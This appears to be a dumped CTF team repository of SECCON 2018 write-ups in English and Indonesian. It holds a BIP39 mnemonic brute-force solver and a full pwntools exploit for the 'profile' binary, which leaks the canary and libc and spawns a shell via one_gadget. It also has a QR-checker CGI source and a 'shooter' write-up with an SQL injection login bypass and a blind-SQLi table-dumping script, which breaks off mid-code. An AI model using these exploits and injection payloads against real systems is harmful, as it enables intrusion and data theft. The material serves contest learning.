ぬいくぎ まんなか たんい そっと", 74 | // seed 75 | "338c161dbdb47c570d5d75d5936e6a32178adde370b6774d40d97a51835d7fec88f859e0a6660891fc7758d451d744d5d3b1a1ebd1123e41d62d5a1550156b1f" 76 | ], 77 | // ... 78 | } 79 | ``` 80 | 81 | Tujuan kita adalah mencari entropy yang diawali string `c0f`, dengan mnemonic yang satu katanya dihilangkan. Kita dapat melakukan bruteforce kata-kata dalam bahasa Jepang yang ada di wordlist, dan memverifikasi seed-nya diawali dengan string `e9a`. Dengan menggunakan script ini, kami mendapatkan flag. 82 | 83 | ```python 84 | import sys 85 | from binascii import hexlify, unhexlify 86 | from mnemonic import Mnemonic 87 | from hashlib import md5 88 | 89 | def b2h(b): 90 | h = hexlify(b) 91 | return h if sys.version < '3' else h.decode('utf8') 92 | 93 | mnemo = Mnemonic("japanese") 94 | words = "とかす なおす よけい ちいさい さんらん けむり ていど かがく とかす そあく きあい ぶどう こうどう ねみみ にあう ねんぐ ひねる おまいり いちじ ぎゅうにく みりょく ろしゅつ あつめる" 95 | words = mnemo.normalize_string(words).split(" ") 96 | for word in mnemo.wordlist: 97 | guess = [word] + words 98 | seed = Mnemonic.to_seed(" ".join(guess), passphrase="") 99 | if not b2h(seed).startswith("e9a"): 100 | continue 101 | 102 | entropy = b2h(mnemo.to_entropy(guess)) 103 | if entropy.startswith("c0f"): 104 | print(entropy) 105 | print("SECCON{%s}" % (md5(entropy.encode()).hexdigest())) 106 | break 107 | ``` 108 | 109 | Flag: `SECCON{cda2cb1742d1b6fc21d05c879c263eec}` -------------------------------------------------------------------------------- /seccon2018/mnemonic/mnemonic.txt: -------------------------------------------------------------------------------- 1 | { 2 | "japanese": [ 3 | [ 4 | "d3a02b9706507552f0e70709f1d4921275204365b4995feae1d949fb59c663cc", 5 | "ふじみ あさひ みのう いっち いがく とない はづき ますく いせえび たれんと おとしもの おどろかす ことし おくりがな ちょうし ちきゅう さんきゃく こんとん せつだん ちしき ぬいくぎ まんなか たんい そっと", 6 | "338c161dbdb47c570d5d75d5936e6a32178adde370b6774d40d97a51835d7fec88f859e0a6660891fc7758d451d744d5d3b1a1ebd1123e41d62d5a1550156b1f" 7 | ], 8 | [ 9 | "dfc9708ac4b4e7f67be6b8e33486482cb363e81967a1569c6fd888b088046f7c", 10 | "ほんやく ごうきゅう おさめる たこやき ごかん れいぎ やせる ふるい まんなか てんない だんろ さうな きぼう よくぼう しのぐ よけい こんき みうち らくご いわかん いこく あたためる のはら たぶん", 11 | "bdadda5bbff97eb4fda0f11c7141bc3ce3de0fef0b2e4c47900858cec639c10187aee4695b1ba462b1dd34b170b62801e68c270b93af62629f4964947a620ed9" 12 | ], 13 | [ 14 | "c0f...", 15 | "??? とかす なおす よけい ちいさい さんらん けむり ていど かがく とかす そあく きあい ぶどう こうどう ねみみ にあう ねんぐ ひねる おまいり いちじ ぎゅうにく みりょく ろしゅつ あつめる", 16 | "e9a..." 17 | ], 18 | ], 19 | "flag": "SECCON{md5(c0f...)}" 20 | } 21 | -------------------------------------------------------------------------------- /seccon2018/profile/README.md: -------------------------------------------------------------------------------- 1 | # Profile 2 | --- 3 | **Points:** 255 | **Solves:** 64/653 | **Category:** Pwn 4 | 5 | Host: profile.pwn.seccon.jp 6 | Port: 28553 7 | 8 | [Download](profile_e814c1a78e80ed250c17e94585224b3f3be9d383) 9 | [Download](libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253) 10 | 11 | --- 12 | 13 | [Bahasa Indonesia](#bahasa-indonesia) 14 | 15 | ## English 16 | ``` 17 | gdb-peda$ file profile_e814c1a78e80ed250c17e94585224b3f3be9d383 18 | Reading symbols from profile_e814c1a78e80ed250c17e94585224b3f3be9d383...(no debugging symbols found)...done. 19 | 20 | gdb-peda$ checksec 21 | CANARY : ENABLED 22 | FORTIFY : disabled 23 | NX : ENABLED 24 | PIE : disabled 25 | RELRO : Partial 26 | ``` 27 | 28 | The challenge is a simple binary to print and store message. 29 | 30 | ``` 31 | Please introduce yourself! 32 | Name >> test 33 | Age >> 21 34 | Message >> nothing 35 | 36 | 1 : update message 37 | 2 : show profile 38 | 0 : exit 39 | >> 40 | ``` 41 | 42 | The prompt is looped, so users can update message and show profile as many times as they want. 43 | Note that name and message are strings, therefore even if we input a long string a buffer overflow will not happen (it will be stored in heap). 44 | 45 | Due to the strings datatype (and int for age), let's assume that input_name, input_age, and input_message is not vulnerable. 46 | Also, due to we do not control anything for show_profile than it is most likely that a vulnerability exists in update_message. 47 | 48 | Below, a snippet of update_message (ida decompiled). 49 | 50 | ```cpp 51 | __int64 __fastcall Profile::update_msg(Profile *this) 52 | { 53 | __int64 v1; // rax 54 | __int64 result; // rax 55 | void *ptr; // [rsp+10h] [rbp-10h] 56 | size_t v4; // [rsp+18h] [rbp-8h] 57 | 58 | ptr = (void *)std::__cxx11::basic_string,std::allocator>::c_str(this); 59 | v4 = malloc_usable_size(ptr); 60 | if ( v4 == 0 ) 61 | { 62 | v1 = std::operator<<>(&std::cout, "Unable to update message."); 63 | result = std::ostream::operator<<(v1, &std::endl>); 64 | } 65 | else 66 | { 67 | std::operator<<>(&std::cout, "Input new message >> "); 68 | result = getn((char *)ptr, v4); 69 | } 70 | return result; 71 | } 72 | ``` 73 | 74 | We can write to message up to the return value of malloc_usable_size(message). 75 | So, how are cpp's strings stored then? For a big string, it will allocate heap with the size of string. 76 | However, there is a thing called Small String Optimization (SSO). It optimizes string allocation by storing small string on the stack. 77 | 78 | What would malloc_usable_size(message) return if message if small then? 79 | 80 | ``` 81 | call 0x400e90 82 | => 0x4010be : mov QWORD PTR [rbp-0x8],rax 83 | ... 84 | 85 | gdb-peda$ p $rax 86 | $1 = 0xfffffffffffffff0 87 | ``` 88 | 89 | It returns a very big number (supposedly negative), that means we can write and possibly have an overflow. 90 | Let's analyze how the program stores name, age, and message. 91 | 92 | ``` 93 | __int64 __fastcall Profile::set_name(__int64 a1, __int64 a2) 94 | { 95 | return std::__cxx11::basic_string,std::allocator>::operator=(a1 + 32, a2); 96 | } 97 | 98 | Profile *__fastcall Profile::set_age(Profile *this, int a2) 99 | { 100 | Profile *result; // rax 101 | 102 | result = this; 103 | *((_DWORD *)this + 16) = a2; 104 | return result; 105 | } 106 | 107 | __int64 __fastcall Profile::set_msg(__int64 a1, __int64 a2) 108 | { 109 | return std::__cxx11::basic_string,std::allocator>::operator=(a1, a2); 110 | } 111 | ``` 112 | 113 | Basically, it stores `set_msg` on `Profile + 0`, `set_name` on `Profile + 32`, and `set_age` on `Profile + 64`. 114 | Below the condition of allocated Profile (small string for message and name). 115 | 116 | ``` 117 | gdb-peda$ x/12gx 0x7fff85a09e90 118 | 0x7fff85a09e90: 0x00007fff85a09e60 <= pointer to msg 0x0000000000000002 <= msg length 119 | 0x7fff85a09ea0: 0x0000000000006161 0x0000000000000000 120 | 0x7fff85a09eb0: 0x00007fff85a09e80 <= pointer to name 0x0000000000000007 <= name length 121 | 0x7fff85a09ec0: 0x0061616161616161 0x0000000000000000 122 | 0x7fff85a09ed0: 0x0000000000000001 <= age 0xef86cdc445a5ec00 <= canary 123 | 0x7fff85a09ee0: 0x00007fff85a09fd0 0x0000000000000000 124 | 0x7fff85a09ef0: 0x00000000004016b0 <= ret address 0x00007ffff74791c1 <= __libc_start_main+240 125 | 126 | ``` 127 | 128 | We can write as many as we want from msg (0x7fff85a09ea0), but there is a canary. 129 | We can leak canary but partially overwriting (first byte) of pointer_to_name in order to print the canary. 130 | 131 | We can leak through (in the example) 0x00007fff85a09e00 - 0x00007fff85a09eff to enable a consistent read of canary. 132 | However, for this challenge I just put in `d9` for the partial overwrite (canary's first byte is always 0x00). Randomization is on, so canary's address (first-byte) can be 0xf8, 0xe8, 0x38, etc, but it is always aligned, so the chance of having it in 0xd9 is not low. 133 | 134 | We can also leak libc by the offset `f8`. We then spawn shell by using one_gadget. 135 | Below is the script used. My script takes awhile (not that long) to spawn shell. It is a little bit faster to write the code that way, sorry :( 136 | 137 | ```python 138 | from pwn import * 139 | 140 | debug = 0 141 | one = [0x45216, 0x4526a, 0xf02a4, 0xf1147] 142 | libc = ELF('./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253') 143 | 144 | while (1): 145 | if debug: 146 | r = process(['./profile_e814c1a78e80ed250c17e94585224b3f3be9d383'], env={"LD_PRELOAD":"./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253"}) 147 | else: 148 | r = remote('profile.pwn.seccon.jp', 28553) 149 | 150 | r.recvuntil('>>') 151 | r.sendline('a' * 7) 152 | r.recvuntil('>>') 153 | r.sendline('31337') 154 | r.recvuntil('>>') 155 | r.sendline('aa') 156 | 157 | r.recvuntil('>>') 158 | r.sendline('1') 159 | r.recvuntil('>>') 160 | r.sendline(p64(0) * 2 + '\xd9') 161 | 162 | r.recvuntil('>>') 163 | r.sendline('2') 164 | r.recvuntil('Name : ') 165 | canary = u64('\x00' + r.recvline().strip()) 166 | if (canary < (1 << 56)): 167 | r.close() 168 | continue 169 | 170 | r.recvuntil('>>') 171 | r.sendline('1') 172 | r.recvuntil('>>') 173 | r.sendline(p64(0) * 2 + '\xf8') 174 | 175 | r.recvuntil('>>') 176 | r.sendline('2') 177 | r.recvuntil('Name : ') 178 | lsm = u64(r.recvline().strip().ljust(8, '\x00')) 179 | if (lsm < 0x7f0000000000): 180 | r.close() 181 | continue 182 | 183 | libc_base = lsm - libc.symbols.__libc_start_main - 240 184 | print hex(canary) 185 | print hex(libc_base) 186 | 187 | r.recvuntil('>>') 188 | r.sendline('1') 189 | r.recvuntil('>>') 190 | r.sendline(p64(0) * 7 + p64(canary) + p64(0) * 3 + p64(libc_base + one[0])) 191 | 192 | r.sendline('0') 193 | 194 | r.interactive() 195 | break 196 | ``` 197 | 198 | A better solution by my teammates allow a more reliable shell spawn. 199 | 200 | ```python 201 | from pwn import * 202 | 203 | context.arch = "amd64" 204 | context.os = "linux" 205 | 206 | def debug(p): 207 | if (len(sys.argv) > 1 and sys.argv[1] == "debug"): 208 | util.proc.wait_for_debugger(util.proc.pidof(p)[0]) 209 | 210 | ### end of template 211 | 212 | p = remote('profile.pwn.seccon.jp', 28553) 213 | # p = process('./profile_e814c1a78e80ed250c17e94585224b3f3be9d383') 214 | binelf = ELF('./profile_e814c1a78e80ed250c17e94585224b3f3be9d383') 215 | binlib = ELF('./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253') 216 | 217 | # initialize 218 | p.sendline('abcdefgh') 219 | p.sendline('16961') 220 | p.sendline('abcdefg') 221 | p.recvuntil('exit') 222 | 223 | found = False 224 | for i in range(16): 225 | idx = 15-i 226 | 227 | p.sendline('1') 228 | p.sendline('A' * 0x10 + chr(idx * 0x10)) 229 | p.sendline('2') 230 | p.recvuntil('Name : ') 231 | log.debug(idx) 232 | name = p.recvline() 233 | if name.startswith('AB') and idx-2 >= 0: 234 | age_on = idx 235 | name_on = idx-1 236 | name_ptr = idx-2 237 | p.sendline('1') 238 | p.sendline('A' * 0x10 + chr(name_ptr*0x10)) 239 | p.sendline('2') 240 | p.recvuntil('Name : ') 241 | name_leak = u64(p.recvline().strip().ljust(8, '\x00')) 242 | found = True 243 | break 244 | 245 | if not found: 246 | log.error('Failed, Try again') 247 | exit(0) 248 | 249 | canary_leak = name_leak + 0x28 250 | log.info('Name leak at {}'.format(hex(name_leak))) 251 | log.info('Canary leak at {}'.format(hex(canary_leak))) 252 | 253 | p.sendline('1') 254 | p.sendline('A' * 0x10 + p64(canary_leak)) 255 | p.sendline('2') 256 | p.recvuntil('Name : ') 257 | canary = u64(p.recvline().strip().ljust(8, '\x00')) 258 | 259 | log.info('Canary {}'.format(hex(canary))) 260 | 261 | p.sendline('1') 262 | p.sendline('A' * 0x10 + p64(binelf.got['read'])) 263 | p.sendline('2') 264 | p.recvuntil('Name : ') 265 | read_loc = u64(p.recvline().strip().ljust(8, '\x00')) 266 | one_gadget = 0x45216 267 | one_gadget_loc = read_loc + one_gadget - binlib.symbols['read'] 268 | 269 | log.info('One Gadget {}'.format(hex(one_gadget_loc))) 270 | 271 | p.sendline('1') 272 | p.sendline('\x00' * 0x38 + p64(canary) + '\x00' * 0x18 + p64(one_gadget_loc)) 273 | 274 | p.sendline('0') 275 | 276 | p.interactive() 277 | ``` 278 | 279 | ## Bahasa Indonesia 280 | ``` 281 | gdb-peda$ file profile_e814c1a78e80ed250c17e94585224b3f3be9d383 282 | Reading symbols from profile_e814c1a78e80ed250c17e94585224b3f3be9d383...(no debugging symbols found)...done. 283 | 284 | gdb-peda$ checksec 285 | CANARY : ENABLED 286 | FORTIFY : disabled 287 | NX : ENABLED 288 | PIE : disabled 289 | RELRO : Partial 290 | ``` 291 | 292 | Diberikan sebuah binary untuk menambahkan pesan dan menampilkan pesan. 293 | 294 | ``` 295 | Please introduce yourself! 296 | Name >> test 297 | Age >> 21 298 | Message >> nothing 299 | 300 | 1 : update message 301 | 2 : show profile 302 | 0 : exit 303 | >> 304 | ``` 305 | 306 | Pengguna dapat menambah dan menampilkan pesan berulang, tidak ada maksimum iterasi. 307 | Tipe data untuk name dan message adalah string, jadi tidak akan terjadi buffer overflow meskipun input panjang (akan disimpan pada heap). 308 | 309 | Karena menggunakan string (dan int untuk age), asumsi bahwa input_name, input_age, dan input_message tidak vulnerable. 310 | Selain itu, kita tidak memiliki kontrol atas show_profile sehingga kemungkinan vulnerability tidak ada pada fungsi tersebut juga. 311 | 312 | Berikut fungsi update_message (dekompilasi ida). 313 | 314 | ```cpp 315 | __int64 __fastcall Profile::update_msg(Profile *this) 316 | { 317 | __int64 v1; // rax 318 | __int64 result; // rax 319 | void *ptr; // [rsp+10h] [rbp-10h] 320 | size_t v4; // [rsp+18h] [rbp-8h] 321 | 322 | ptr = (void *)std::__cxx11::basic_string,std::allocator>::c_str(this); 323 | v4 = malloc_usable_size(ptr); 324 | if ( v4 == 0 ) 325 | { 326 | v1 = std::operator<<>(&std::cout, "Unable to update message."); 327 | result = std::ostream::operator<<(v1, &std::endl>); 328 | } 329 | else 330 | { 331 | std::operator<<>(&std::cout, "Input new message >> "); 332 | result = getn((char *)ptr, v4); 333 | } 334 | return result; 335 | } 336 | ``` 337 | 338 | Kita dapat mengubah message sejumlah hasil dari malloc_usable_size(message). 339 | Pada cpp, string disimpan pada heap. Namun, ada Small String Optimization (SSO). SSO mengoptimasi penggunaan string dengan menuliskan string kecil pada stack. 340 | 341 | Apa output dari malloc_usable_size(message) apabila string kecil (disimpan pada stack)? 342 | 343 | ``` 344 | call 0x400e90 345 | => 0x4010be : mov QWORD PTR [rbp-0x8],rax 346 | ... 347 | 348 | gdb-peda$ p $rax 349 | $1 = 0xfffffffffffffff0 350 | ``` 351 | 352 | Outputnya ternyata adalah bilangan negatif, karena bilangan tersebut diinterpretasikan sebagai unsigned (nilai menjadi sangat besar), kita mendapatkan overflow pada stack. 353 | Mari analisa penyimpanan message, name, dan age pada program. 354 | 355 | ``` 356 | __int64 __fastcall Profile::set_name(__int64 a1, __int64 a2) 357 | { 358 | return std::__cxx11::basic_string,std::allocator>::operator=(a1 + 32, a2); 359 | } 360 | 361 | Profile *__fastcall Profile::set_age(Profile *this, int a2) 362 | { 363 | Profile *result; // rax 364 | 365 | result = this; 366 | *((_DWORD *)this + 16) = a2; 367 | return result; 368 | } 369 | 370 | __int64 __fastcall Profile::set_msg(__int64 a1, __int64 a2) 371 | { 372 | return std::__cxx11::basic_string,std::allocator>::operator=(a1, a2); 373 | } 374 | ``` 375 | 376 | Program menyimpan `set_msg` pada `Profile + 0`, `set_name` pada `Profile + 32`, dan `set_age` pada `Profile + 64`. 377 | Berikut kondisi alokasi Profile (string pendek untuk message dan name). 378 | 379 | ``` 380 | gdb-peda$ x/12gx 0x7fff85a09e90 381 | 0x7fff85a09e90: 0x00007fff85a09e60 <= pointer to msg 0x0000000000000002 <= msg length 382 | 0x7fff85a09ea0: 0x0000000000006161 0x0000000000000000 383 | 0x7fff85a09eb0: 0x00007fff85a09e80 <= pointer to name 0x0000000000000007 <= name length 384 | 0x7fff85a09ec0: 0x0061616161616161 0x0000000000000000 385 | 0x7fff85a09ed0: 0x0000000000000001 <= age 0xef86cdc445a5ec00 <= canary 386 | 0x7fff85a09ee0: 0x00007fff85a09fd0 0x0000000000000000 387 | 0x7fff85a09ef0: 0x00000000004016b0 <= ret address 0x00007ffff74791c1 <= __libc_start_main+240 388 | 389 | ``` 390 | 391 | Kita dapat menulis sejumlah berapapun pada msg (0x7fff85a09ea0), tetapi ada canary. 392 | Canary dapat di-leak dengan menulis byte pertama (partial overwrite) dari pointer_to_name. 393 | 394 | Kita dapat me-leak (seperti pada contoh) 0x00007fff85a09e00 - 0x00007fff85a09eff untuk mendapatkan pembacaan konsisten canary. 395 | Namun, untuk soal ini saya selalu menulis `d9` untuk partial overwrite (byte pertama canary selalu 0x00). Terdapat ASLR, jadi byte pertama alamat canary dapat berupa 0xf8, 0xe8, 0x38, dst. Namun karena selalu aligned (tidak mungkin terdapat pada 0x31, 0x57, 0x99, dst) maka kemungkinan terdapat pada 0xd9 tidak kecil. 396 | 397 | Kita juga dapat leak libc pada `f8`. Selanjutnya spawn shell dengan one_gadget. 398 | Berikut kode yang digunakan. Kode tersebut akan memakan waktu (tidak lama) untuk spawn shell. Sedikit lebih cepat menulis kode tersebut, maaf :( 399 | 400 | ```python 401 | from pwn import * 402 | 403 | debug = 0 404 | one = [0x45216, 0x4526a, 0xf02a4, 0xf1147] 405 | libc = ELF('./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253') 406 | 407 | while (1): 408 | if debug: 409 | r = process(['./profile_e814c1a78e80ed250c17e94585224b3f3be9d383'], env={"LD_PRELOAD":"./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253"}) 410 | else: 411 | r = remote('profile.pwn.seccon.jp', 28553) 412 | 413 | r.recvuntil('>>') 414 | r.sendline('a' * 7) 415 | r.recvuntil('>>') 416 | r.sendline('31337') 417 | r.recvuntil('>>') 418 | r.sendline('aa') 419 | 420 | r.recvuntil('>>') 421 | r.sendline('1') 422 | r.recvuntil('>>') 423 | r.sendline(p64(0) * 2 + '\xd9') 424 | 425 | r.recvuntil('>>') 426 | r.sendline('2') 427 | r.recvuntil('Name : ') 428 | canary = u64('\x00' + r.recvline().strip()) 429 | if (canary < (1 << 56)): 430 | r.close() 431 | continue 432 | 433 | r.recvuntil('>>') 434 | r.sendline('1') 435 | r.recvuntil('>>') 436 | r.sendline(p64(0) * 2 + '\xf8') 437 | 438 | r.recvuntil('>>') 439 | r.sendline('2') 440 | r.recvuntil('Name : ') 441 | lsm = u64(r.recvline().strip().ljust(8, '\x00')) 442 | if (lsm < 0x7f0000000000): 443 | r.close() 444 | continue 445 | 446 | libc_base = lsm - libc.symbols.__libc_start_main - 240 447 | print hex(canary) 448 | print hex(libc_base) 449 | 450 | r.recvuntil('>>') 451 | r.sendline('1') 452 | r.recvuntil('>>') 453 | r.sendline(p64(0) * 7 + p64(canary) + p64(0) * 3 + p64(libc_base + one[0])) 454 | 455 | r.sendline('0') 456 | 457 | r.interactive() 458 | break 459 | ``` 460 | 461 | Berikut solusi lain dari anggota tim yang lebih dapat diandalkan (tidak harus menunggu untuk spawn shell). 462 | 463 | ```python 464 | from pwn import * 465 | 466 | context.arch = "amd64" 467 | context.os = "linux" 468 | 469 | def debug(p): 470 | if (len(sys.argv) > 1 and sys.argv[1] == "debug"): 471 | util.proc.wait_for_debugger(util.proc.pidof(p)[0]) 472 | 473 | ### end of template 474 | 475 | p = remote('profile.pwn.seccon.jp', 28553) 476 | # p = process('./profile_e814c1a78e80ed250c17e94585224b3f3be9d383') 477 | binelf = ELF('./profile_e814c1a78e80ed250c17e94585224b3f3be9d383') 478 | binlib = ELF('./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253') 479 | 480 | # initialize 481 | p.sendline('abcdefgh') 482 | p.sendline('16961') 483 | p.sendline('abcdefg') 484 | p.recvuntil('exit') 485 | 486 | found = False 487 | for i in range(16): 488 | idx = 15-i 489 | 490 | p.sendline('1') 491 | p.sendline('A' * 0x10 + chr(idx * 0x10)) 492 | p.sendline('2') 493 | p.recvuntil('Name : ') 494 | log.debug(idx) 495 | name = p.recvline() 496 | if name.startswith('AB') and idx-2 >= 0: 497 | age_on = idx 498 | name_on = idx-1 499 | name_ptr = idx-2 500 | p.sendline('1') 501 | p.sendline('A' * 0x10 + chr(name_ptr*0x10)) 502 | p.sendline('2') 503 | p.recvuntil('Name : ') 504 | name_leak = u64(p.recvline().strip().ljust(8, '\x00')) 505 | found = True 506 | break 507 | 508 | if not found: 509 | log.error('Failed, Try again') 510 | exit(0) 511 | 512 | canary_leak = name_leak + 0x28 513 | log.info('Name leak at {}'.format(hex(name_leak))) 514 | log.info('Canary leak at {}'.format(hex(canary_leak))) 515 | 516 | p.sendline('1') 517 | p.sendline('A' * 0x10 + p64(canary_leak)) 518 | p.sendline('2') 519 | p.recvuntil('Name : ') 520 | canary = u64(p.recvline().strip().ljust(8, '\x00')) 521 | 522 | log.info('Canary {}'.format(hex(canary))) 523 | 524 | p.sendline('1') 525 | p.sendline('A' * 0x10 + p64(binelf.got['read'])) 526 | p.sendline('2') 527 | p.recvuntil('Name : ') 528 | read_loc = u64(p.recvline().strip().ljust(8, '\x00')) 529 | one_gadget = 0x45216 530 | one_gadget_loc = read_loc + one_gadget - binlib.symbols['read'] 531 | 532 | log.info('One Gadget {}'.format(hex(one_gadget_loc))) 533 | 534 | p.sendline('1') 535 | p.sendline('\x00' * 0x38 + p64(canary) + '\x00' * 0x18 + p64(one_gadget_loc)) 536 | 537 | p.sendline('0') 538 | 539 | p.interactive() 540 | ``` 541 | -------------------------------------------------------------------------------- /seccon2018/profile/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/profile/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253 -------------------------------------------------------------------------------- /seccon2018/profile/profile_e814c1a78e80ed250c17e94585224b3f3be9d383: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/profile/profile_e814c1a78e80ed250c17e94585224b3f3be9d383 -------------------------------------------------------------------------------- /seccon2018/qr-checker/README.md: -------------------------------------------------------------------------------- 1 | # QR Checker 2 | --- 3 | **Points:** 222 | **Solves:** 80/653 | **Category:** QR 4 | 5 | QR Checker 6 | 7 | http://qrchecker.pwn.seccon.jp/ 8 | 9 | [Download](qr.cgi_93bb1a11da93ab2a50e61c7da1e62b34d316bc9b) 10 | 11 | --- 12 | 13 | [Bahasa Indonesia](#bahasa-indonesia) 14 | 15 | ## English 16 | TODO 17 | 18 | 19 | ## Bahasa Indonesia 20 | TODO 21 | -------------------------------------------------------------------------------- /seccon2018/qr-checker/qr.cgi_93bb1a11da93ab2a50e61c7da1e62b34d316bc9b: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys, io, cgi, os 3 | from PIL import Image 4 | import zbarlight 5 | print("Content-Type: text/html") 6 | print("") 7 | codes = set() 8 | sizes = [500, 250, 100, 50] 9 | print('') 10 | print('
') 11 | print('') 12 | print('') 13 | print('
') 14 | print('
')
15 | try:
16 | 	form = cgi.FieldStorage()
17 | 	data = form["uploadFile"].file.read(1024 * 256)
18 | 	image= Image.open(io.BytesIO(data))
19 | 	for sz in sizes:
20 | 		image = image.resize((sz, sz))
21 | 		result= zbarlight.scan_codes('qrcode', image)
22 | 		if result == None:
23 | 			break
24 | 		if 1 < len(result):
25 | 			break
26 | 		codes.add(result[0])
27 | 	for c in sorted(list(codes)):
28 | 		print(c.decode())
29 | 	if 1 < len(codes):
30 | 		print("SECCON{" + open("flag").read().rstrip() + "}")
31 | except:
32 | 	pass
33 | print('
') 34 | print('') 35 | 36 | -------------------------------------------------------------------------------- /seccon2018/runme/README.md: -------------------------------------------------------------------------------- 1 | # QR Checker 2 | --- 3 | **Points:** 102 | **Solves:** 352/653 | **Category:** Reversing 4 | 5 | Run me. 6 | 7 | [Download](runme.exe_b834d0ce1d709affeedb1ee4c2f9c5d8ca4aac68) 8 | 9 | --- 10 | 11 | [Bahasa Indonesia](#bahasa-indonesia) 12 | 13 | ## English 14 | TODO 15 | 16 | 17 | ## Bahasa Indonesia 18 | TODO 19 | -------------------------------------------------------------------------------- /seccon2018/runme/runme.exe_b834d0ce1d709affeedb1ee4c2f9c5d8ca4aac68: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/runme/runme.exe_b834d0ce1d709affeedb1ee4c2f9c5d8ca4aac68 -------------------------------------------------------------------------------- /seccon2018/shooter/README.md: -------------------------------------------------------------------------------- 1 | # shooter 2 | --- 3 | **Points:** 434 | **Solves:** 13/653 | **Category:** Reversing 4 | 5 | shooter 6 | 7 | Enjoy the game! 8 | 9 | [Download](shooter.apk_d0d2ed9e7ba3c83354cbbf7ccf82541730b14a72) 10 | 11 | --- 12 | 13 | [Bahasa Indonesia](#bahasa-indonesia) 14 | 15 | ## English 16 | With some recon, we learned that APK is built with Unity. There's also `lib/x86/libil2cpp.so` file, hinting it's built with [IL2CPP](https://docs.unity3d.com/Manual/IL2CPP.html). We used [IL2CppDumper](https://github.com/Perfare/Il2CppDumper) to analyze this APK, and provide the `lib/x86/libil2cpp.so` and `assets/bin/Data/Managed/Metadata/global-metadata.dat` file from APK. We used `Auto (Plus)` method to dump. Then, it produced several files, the most interesting one is `dump.cs` and `script.py`. 17 | 18 | File `dump.cs` contains classes and interfaces. 19 | ```c# 20 | ... 21 | public static class Config // TypeDefIndex: 3750 22 | { 23 | // Fields 24 | public static string domain; // 0x0 25 | public static string stgDomain; // 0x4 26 | public static string devDomain; // 0x8 27 | public static string adminApi; // 0xC 28 | } 29 | ... 30 | public class GameDirector : MonoBehaviour // TypeDefIndex: 3753 31 | { 32 | // Methods 33 | public void .ctor(); // 0xB1BF86 34 | private void Start(); // 0xB1C018 35 | private void ChangeStep(); // 0xB1C123 36 | private void HandleChangingStep(); // 0xB1C13B 37 | private void Update(); // 0xB1C41C 38 | public void UpdateScore(); // 0xB1C283 39 | public void UpdateMiss(); // 0xB1C36D 40 | public void UpdateRanking(string rankingText); // 0xB1C450 41 | public void AddScore(float score); // 0xB1C4F9 42 | public void IncrementMiss(); // 0xB1C530 43 | public void SubmitScore(); // 0xB1C5D3 44 | public void Retry(); // 0xB1C7B6 45 | private IEnumerator PostScore(string name, int score); // 0xB1C716 46 | } 47 | ... 48 | ``` 49 | 50 | File `script.py` contains recovered symbols and can be run in IDA to rename stripped functions and symbols. 51 | ```python 52 | ... 53 | SetString(0x11BB818, r'shooter.pwn.seccon.jp') 54 | SetString(0x11BB81C, r'staging.shooter.pwn.seccon.jp') 55 | SetString(0x11BB820, r'develop.shooter.pwn.seccon.jp') 56 | SetString(0x11BB824, r'/admin') 57 | SetString(0x11BB828, r'Score') 58 | SetString(0x11BB82C, r'Miss') 59 | SetString(0x11BB830, r'PlaneGenerator') 60 | SetString(0x11BB834, r'ScoreFormView') 61 | SetString(0x11BB838, r'RankingView') 62 | SetString(0x11BB83C, r'Ranking') 63 | SetString(0x11BB840, r'score') 64 | SetString(0x11BB844, r'/api/v1/scores') 65 | ... 66 | ``` 67 | 68 | So we found some interesting domain and endpoints. We tried to access http://staging.shooter.pwn.seccon.jp/admin/ and redirected to a login page. 69 | 70 | ![login](shooter_login.png) 71 | 72 | We did some fuzzing, and got error if our password contains `'` character. 73 | 74 | ![error](shooter_error.png) 75 | 76 | We suspected that it's vulnerable to SQL injection. We continued to fuzz and finally can login with password `'))) or 1-- -`! Here we can see last 20 scores. 77 | 78 | ![scores](shooter_scores.png) 79 | 80 | But other than that, nothing was interesting. We decided to dump database tables using boolean-based SQL injection with this script. We also used binary search to speed up the injection. 81 | 82 | ```python 83 | import requests 84 | import re 85 | import string 86 | 87 | def check(s): 88 | sess = requests.Session() 89 | r = sess.get("http://staging.shooter.pwn.seccon.jp/admin/sessions/new") 90 | auth_token = re.findall(r'name="authenticity_token" value="(.+?)"', r.text)[0] 91 | data = { 92 | "login_id": "admin", 93 | "authenticity_token": auth_token, 94 | "password": "')))||(select case when ({}) then 1 else 0 end)#".format(s) 95 | } 96 | r = sess.post("http://staging.shooter.pwn.seccon.jp/admin/sessions", data=data) 97 | if not r.ok: 98 | return False 99 | r = sess.get("http://staging.shooter.pwn.seccon.jp/admin/users", allow_redirects=False) 100 | return r.status_code == 200 101 | 102 | def dump_tables(): 103 | tables = "" 104 | while 1: 105 | lo = 0 106 | hi = 255 107 | while lo <= hi: 108 | mid = (lo+hi)//2 109 | s = "select ascii(substr((select group_concat(table_name) from information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'),{},1)) > {}" 110 | s = s.format(len(tables)+1,mid) 111 | if check(s): 112 | lo = mid+1 113 | else: 114 | hi = mid-1 115 | if lo == 0: 116 | return tables 117 | tables += chr(lo) 118 | print(tables) 119 | 120 | dump_tables() 121 | ``` 122 | 123 | We got this output. 124 | ``` 125 | a 126 | ar 127 | ar_ 128 | ar_i 129 | ... 130 | ar_internal_metadata,flags,managers,schema_migrations,score 131 | ar_internal_metadata,flags,managers,schema_migrations,scores 132 | ``` 133 | 134 | Table `flags` sounds interesting. Then, we dumped the columns from the table. 135 | 136 | ```python 137 | ... 138 | def dump_columns(table_name): 139 | columns = "" 140 | while 1: 141 | lo = 0 142 | hi = 255 143 | while lo <= hi: 144 